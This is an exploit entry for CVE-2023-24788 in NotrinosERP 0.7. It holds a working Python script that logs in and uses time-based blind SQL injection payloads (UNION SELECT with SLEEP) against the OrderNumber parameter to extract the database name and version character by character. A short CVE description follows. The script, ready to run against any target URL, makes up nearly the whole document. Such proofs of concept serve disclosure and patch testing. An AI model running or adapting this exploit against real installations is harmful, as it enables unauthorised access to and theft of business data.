NotrinosERP 0.7 SQL Injection
NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.
# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j))) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) res = r.text if "NotrinosERP 0.7 - Login" in res: session_cookies = login(target, username, password) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) elif (r.elapsed.total_seconds () > 2 ): return j return Nonedef login(target, username, password): target = "%s/index.php" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781') def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_name += chr(retrieved_value) else: break print("Database Name: "+db_name) def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_version += chr(retrieved_value) sys.stdout.flush() else: break print("Database Version: "+db_version)def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main()
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CVE-2023-24788: CVE/CVE-2023-24788.md at main · arvandy/CVE
RESERVED NotrinosERP v0.7 was discovered to contain a SQL injection vulnerability via the OrderNumber parameter at /NotrinosERP/sales/customer_delivery.php.